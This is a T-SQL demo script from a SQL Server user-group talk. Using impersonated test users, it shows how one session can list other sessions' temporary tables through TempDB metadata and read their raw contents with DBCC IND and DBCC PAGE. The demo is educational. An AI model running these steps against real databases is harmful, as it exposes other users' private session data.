﻿/* 
    PASS Virtual Group Global Portuguese
    SQL Curiosities: A Curiosidade Matou O Gato
    2017-04-18 (version 1.26A)
    Demo - Hacking Temporary Tables
    André Melancia
    http://Andy.PT

    (C) 2016-2017, André Melancia



░░░░░░░░▄░█▀▀▀▀▀█▀█▀█▀▀▀█▀█▀▀▀█░▄░░░░░░░░
░░░░▄░█░█░█░█▀█░█░█░█▄░▀█░█░███░█░█░▄░░░░
▄░█░█░█░█░█▄█▄█▄█▄▄▄█▄▄▄█▄█▄▄▄█░█░█░█░█░▄
| ▌▌| ▌▌▌| ▌▌| ▌▌▌| ▌▌| ▌▌▌| ▌▌| ▌▌▌| ▌▌| ▌▌▌| ▌▌| ▌▌| ▌
|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|̲ ̲|
                                                                                  .--.
                                                                                 J    L
                                                                                 |    |
                                                                                 F    F
         ♪ ♫ ♪ ♫ ♪ ♫ ♪ ♫ ♪ ♫                                                    J    J
                                                                               /    /
               ♪ ♫ ♪ ♫ ♪ ♫ ♪ ♫ ♪ ♫                                            /    /
                                                                            .'    /
                                                    .--""--._              /     /
                                                _.-'         `-.          /     /
                                     __       .'                `.       /     /
                                  _-'-."`-.  J                    \     /     /
                             .---(  `, _   `'|                     `.  J     /
                               `. )                                  ""     /
                                F                                          J
                                L                  |                      J
                                ` (/     /         |                      F
                                 |    ._'          |                      |
                                /'`--'`.           |                      J
                                '||\   |-._        `.  ___.               |
                                  `     \  `.        |/    `-            J
                                         F   L       /       J           /
                                         |   J      J         F         J
                                         |    \     J         |        J
                                         |    |L    J         J        J
                                         |    FJ    |          L       |
              VK                         |   J  L   |          L\      F
                                         |   F  |   |           L\    J
                                         F  F   |   |           | L   |
                                        J  J    |   |           | |   F
                                        /  )    F  J            F F  J
                                       ( .'    )   F           J J  F
                                       `"     (   J           /.'  J
                                               `-'           ||-' |)
                                                               '-'


--*/


--  +----------------------------------------------------------------+
--  | FELINE TASKS                                                   |
--  +----------------------------------------------------------------+

    -- WARNING: Run these scripts on an EMPTY database!

    -- INSTRUCTIONS: Run one statement at a time.
    

--  +----------------------------------------------------------------+
--  | Sharpening the claws                                           |
--  +----------------------------------------------------------------+

    USE PUSSYCAT;           -- Or whatever database you created!
                            -- Please don't run this on the Master, that's
                            -- just ugly!
    GO

    -- Altoug they usually have 9 lives, we're going to kill them faster...
	-- Note: "IF EXISTS" are ugly. First time these will generate errors
    --       Just accept the errors as part of a 9-lives feline's living ;)
    DROP USER Simba;
    DROP USER Garfield;
    DROP USER TopCat;
    DROP USER GrumpyCat;
    GO
    

    DROP TABLE    dbo.CatSongs;
    GO


--  +----------------------------------------------------------------+
--  | CREATE USERS                                                   |
--  +----------------------------------------------------------------+

    CREATE USER Simba     WITHOUT LOGIN;
    CREATE USER Garfield  WITHOUT LOGIN;
    CREATE USER TopCat    WITHOUT LOGIN;
    CREATE USER GrumpyCat WITHOUT LOGIN;
   

--  +----------------------------------------------------------------+
--  | CREATE TABLE dbo.CatSongs                                      |
--  +----------------------------------------------------------------+

    CREATE TABLE dbo.CatSongs
    (
        SongID       INT           NOT NULL,
        SongTitle    NVARCHAR(64)  NOT NULL,
        SongYear     INT           NOT NULL,
        SongArtist   NVARCHAR(64)  NOT NULL,
        SongUser     SYSNAME       NOT NULL,
        Payment      INT           NOT NULL,
        CONSTRAINT PK_CatSongs   PRIMARY KEY CLUSTERED  ( SongID ASC ) 
    );


    -- Insert some REAL top secret DISCO information
    INSERT INTO dbo.CatSongs
    (SongID, SongTitle, SongYear, SongArtist, SongUser, Payment) 
    VALUES 
	( 1, 'Can''t Get Enough Of Your Love',    1974, 'Barry White',  	 'Barry',     10000),
	( 2, 'Stayin'' Alive',                    1977, 'Bee Gees', 		 'BeeGees',   10000),
	( 3, 'Night Fever',                       1977, 'Bee Gees', 		 'BeeGees',   10000),
	( 4, 'Le Freak',                          1978, 'Chic', 			 'Chic',      10000),
	( 5, 'Good Times',                        1979, 'Chic', 	 		 'Chic',      10000),
	( 6, 'I Feel Love',                       1977, 'Donna Summer', 	 'Donna',     10000),
	( 7, 'Love To Love You Baby',             1975, 'Donna Summer', 	 'Donna',     10000),
	( 8, 'Last Dance',                        1978, 'Donna Summer', 	 'Donna',     10000),
	( 9, 'Hot Stuff',                         1979, 'Donna Summer',  	 'Donna',     10000),
	(10, 'Bad Girls',                         1979, 'Donna Summer',      'Donna',     10000),
	(11, 'I Will Survive',                    1978, 'Garfield Gaynor',   'Garfield',  10000),
	(12, 'Never Can Say Goodbye',             1974, 'Garfield Gaynor',   'Garfield',  10000),
	(13, 'Honey Bee',                         1973, 'Garfield Gaynor',   'Garfield',  10000),
	(14, 'Last Night a D.J. Saved My Life',   1982, 'Indeep',		     'Indeep',    10000),
	(15, 'Celebration',                       1980, 'Kool & the Gang',   'Kool',      10000),
	(16, 'Ladies Night',                      1979, 'Kool & the Gang',   'Kool',      10000),
	(17, 'Funky Town',                        1979, 'Lipps Inc.',        'Lipps',     10000),
	(18, 'Born To Be Alive',                  1979, 'Patrick Hernandez', 'Hernandez', 10000),
	(19, 'Super Freak',                       1981, 'Rick James',        'RickJames', 10000),
	(20, 'Give It To Me Baby',                1981, 'Rick James',        'RickJames', 10000),
	(21, 'We Are Family',                     1979, 'Sister Sledge',     'Sister',    10000),
	(22, 'Don''t Leave Me This Way',          1976, 'Thelma Houston',    'Thelma',    10000),
	(23, 'Disco Inferno',                     1976, 'Trammps',   		 'Trammps',   10000),
	(24, 'Where Do We Go From Here',          1974, 'Trammps',			 'Trammps',   10000),
	(25, 'Zing Went The Strings Of My Heart', 1972, 'Trammps',			 'Trammps',   10000),
	(26, 'That''s Where The Happy People Go', 1976, 'Trammps',			 'Trammps',   10000),
	(27, 'Y.M.C.A.',                          1978, 'TopCat People',	 'TopCat',    10000),
	(28, 'Macho Man',                         1978, 'TopCat People',	 'TopCat',    10000),
	(29, 'San Francisco (medley)',            1977, 'TopCat People',	 'TopCat',    10000),
	(30, 'In The Navy',                       1979, 'TopCat People',	 'TopCat',    10000),
	(31, 'Go West',                           1979, 'TopCat People',	 'TopCat',    10000),
	(32, 'It''s Raining Men',                 1982, 'Weather Girls',	 'Weather',   10000);


    -- Super groovy bragging technique
    SELECT * FROM dbo.CatSongs;
    GO


--  +----------------------------------------------------------------+
--  | Thank you for the music!                                       |
--  +----------------------------------------------------------------+

    -- Special thanks to 
    --     Miguel Oliveira
    --     https://www.linkedin.com/in/miguel-oliveira-96a7716/

    -- See also
	--     Paul White's article
	--     http://sqlblog.com/blogs/paul_white/archive/2010/08/14/viewing-another-session-s-temporary-table.aspx


--  +----------------------------------------------------------------+
--  | Groovy TempDB stuff                                            |
--  +----------------------------------------------------------------+

    GRANT SELECT ON dbo.CatSongs TO Public;


	-- Create a temp table as TopCat People and as Garfield 
	-- (use different connections)
	-- START
	EXECUTE AS USER = 'TopCat';
    
	SELECT *, CURRENT_USER AS TempTableUser
	INTO #CatHackTable
	FROM dbo.CatSongs;

	SELECT *, CURRENT_USER AS SelectUser FROM #CatHackTable;

    REVERT; -- Go back to connection default user
    -- END
	
	-- Now as DBO...
	SELECT *, CURRENT_USER AS SelectUser FROM #CatHackTable; -- FAIL!


--  +-------------------------------------------------------------+
--  | TEMPDB TEMP TABLE EXPLOITS - METADATA                       |
--  +-------------------------------------------------------------+

	EXECUTE AS USER = 'GrumpyCat';

	-- Get all tables names and some info
	SELECT * 
	FROM   TempDB.Sys.SysObjects
	WHERE  xtype  =    'U' 
	   AND [name] LIKE '%Hack%';


	-- Get number of records on those tables
	SELECT * 
	FROM   TempDB.Sys.Partitions
	WHERE  [object_id] IN (	SELECT id 
							FROM   TempDB.Sys.SysObjects
							WHERE  xtype  =    'U' 
							   AND [name] LIKE '%Hack%'
					      );


	-- Get columns in those tables
	SELECT * 
	FROM   TempDB.Sys.All_Columns
	WHERE  [object_id] IN (	SELECT id 
							FROM   TempDB.Sys.SysObjects
							WHERE  xtype  =    'U' 
							   AND [name] LIKE '%Hack%'
					      );

	REVERT; 

--  +-------------------------------------------------------------+
--  | TEMPDB TEMP TABLE EXPLOITS - DATA!                          |
--  +-------------------------------------------------------------+
						  					  
	-- Party preparation
	DROP TABLE IF EXISTS #StorageInfo;

	CREATE TABLE #StorageInfo
	(
		PageFID         BIGINT        NULL,
		PagePID         BIGINT        NULL,
		IAMFID          BIGINT        NULL,
		IAMPID          BIGINT        NULL,
		ObjectID        BIGINT        NULL,
		IndexID         BIGINT        NULL,
		PartitionNumber BIGINT        NULL,
		PartitionID     BIGINT        NULL,
		iam_chain_type  NVARCHAR(MAX) NULL,
		PageType        BIGINT        NULL,
		IndexLevel      BIGINT        NULL,
		NextPageFID     BIGINT        NULL,
		NextPagePID     BIGINT        NULL,
		PrevPageFID     BIGINT        NULL,
		PrevPagePID     BIGINT        NULL
    );
	

	-- BOOGIE NIGHTS!!!!
	
	DECLARE @ID INT;
	SET @ID = (	SELECT TOP (1) id 
				FROM   TempDB.Sys.SysObjects
				WHERE  xtype  =    'U' 
			       AND [name] LIKE '%Hack%'
			  );
	SELECT 'Table ID is...', @ID; -- One of the temp table's ID
	                              -- Remember that the TOP (1) only selected one!
	

	-- Get storage location into a table 
	INSERT INTO #StorageInfo
	EXEC ('DBCC IND(''TEMPDB'', ' + @ID + ', -1) WITH TABLERESULTS');

	SELECT * FROM #StorageInfo; -- Show it
	

	-- It's a kind of Magic!
	DBCC TRACEON (3604);


	-- Get data!
	DECLARE @PageFID BIGINT;
	DECLARE @PagePID BIGINT;
	DECLARE cur CURSOR FOR  SELECT PageFID, 
	                               PagePID 
	                        FROM   #StorageInfo;

    OPEN cur;   
	FETCH NEXT FROM cur INTO @PageFID, @PagePID;  

	WHILE @@FETCH_STATUS = 0   
	BEGIN   
		   DBCC PAGE (TEMPDB, @PageFID, @PagePID, 3) WITH TABLERESULTS;

		   FETCH NEXT FROM cur INTO @PageFID, @PagePID   
	END   

	CLOSE cur;
	DEALLOCATE cur;


--  +----------------------------------------------------------------+
--  | Playtime is over.                                              |
--  | Now it's time for a cat nap!                                   |
--  +----------------------------------------------------------------+
